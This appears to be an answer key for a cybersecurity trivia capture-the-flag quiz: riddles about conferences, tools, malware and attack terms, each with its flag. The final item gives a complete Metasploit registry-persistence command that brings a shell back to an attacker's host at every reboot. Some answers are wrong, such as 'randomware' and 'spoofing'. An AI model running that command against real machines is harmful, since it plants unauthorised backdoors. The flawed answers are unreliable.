Business Gathering

I am a huge cyber security conference that run every year in three places : San Francisco, Singapore and Lately AbuDhabi. Who am I ? No spaces in answering
  • Flag: RSAConference

Hackers Gathering

I am a cyber security conference that run in August every year in Las Vegas. I am the largest gathering for Hackers in the whole world. No Credit cards, no online booking , Only Cash allowed . Who am I ?
  • Flag: defcon

Founder

I have founded two of the most famous Cyber Security conferences across the globe in Las Vegas, USA. I am not The Dark Knight. I am The DarK--------?
  • Flag: tangent

Back To History

Back to History: I am the First Computer Virus ever known . You will find me in your head . My name is ……..?
  • Flag: brain

Contribute

I am an Organization that releases the Top 10 Vulnerabilities in Application Security . I am ……?
  • Flag: OWASP

Greeks

The art of hiding messages or information inside other image / text or data
  • Flag: steganography

Robot

A group or network of machines that are controlled by an attacker to do a certain task
  • Flag: bot

Japanese Warrior

I am a linux distrubition with two versions one for Web Penetration Testing and the other for attacking smart grids. What is my smart grid distribution name ?
  • Flag: SamuraiSTFU

Close Look

I am a linux distribution that has many tricks to do packet and traffic analysis. Who am I ?
  • Flag: Packetrix

Pay Me

I will lock your machine screen or files till you pay me. Who am i ?
  • Flag: randomware

TrendMicro Conference

Periodic Conference in many cities hosted by Trend Micro
  • Flag: CLOUDSEC

Intercept

the attacker intercept information between receiver and sender. what is the attack name ?
  • Flag: mitm

Do you trust senders

Receive malware from a known person. What is the attack type ?
  • Flag: spoofing

My box

I am a professional pen tester. I do not need to know any information from the customer, I do ....box pen test
  • Flag: black

Crash

enter a lot of random trash till the application crash
  • Flag: fuzzing

Scan

One of the famous, free port scanner. Who am i ?
  • Flag: nmap

Capture

Network analysis tool used to captured packets and present it in readable format
  • Flag: wireshark

Precious Vulnerability

a security flaw that is not yet known
  • Flag: zeroday

SCADA

A worm that targeted SCADA Systems
  • Flag: Stuxnet

htmlentities

True or False , htmlentities ( convert special characters to its html entity ) can't be exploited to run XSS payload ?
  • Flag: False

Encoding

What type of this encoded , hashed text "aGVsbG93b3JsZDEx" ?
  • Flag: base64

Reward

I receive a reward or mentioned on a wall of fame when i found vulnerability . I am participating in ..... program? Format of Flag ( Do not use spaces)
  • Flag: bugbounty

Hide me

I act as a middle man to forward requests from different devices to access external resources . I am a ......?
  • Flag: proxy

Cash

I am a type of attacks that used to spread malware. I push data in the cache records of your DNS. I am cache ........?
  • Flag: poisoning

User Name

He is a user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system.
  • Flag: root

Crime scene

Process of analyzing and investing computer devices, on suspecting that such devices may have been used in a cybercrime
  • Flag: forensics

CVE Number

What is the CVE ID that is related to EternalBlue
Flag Format: XXX-XXXX-XXXX
  • Flag: CVE-2017-0144

one click

a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts .
  • Flag: CSRF

remove

I need to remove a file called secret in my home directory. which command should i use 
  • Flag: rm ~/secret

Distribution

Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture
The flag without spaces 
  • Flag: KaliLinux

security model

is a model designed to guide policies for information security within an organization
  • Flag: CIA

Persistence

You want to achieve persistence using Meterpreter’s persistence module by creating an autorun registry file and getting a shell automatically every time the user restarts the PC

Persistence options 

    Minutes after restarting the system: 7 
    Your Local port: 1337
    Your local host IP: 192.168.0.177

Flag format is: xxx xxxxxxx/xxxxxxx/xxxxx/xxxxxxxx_xxxxxxxxxxx xxxxx_xxxx=xxx  xxxxx=xxxx xxxxx=xxx.xxx.x.xxx
  • Flag: use exploit/windows/local/registry_persistence SLEEP_TIME=420 LPORT=1337 LHOST=192.168.0.177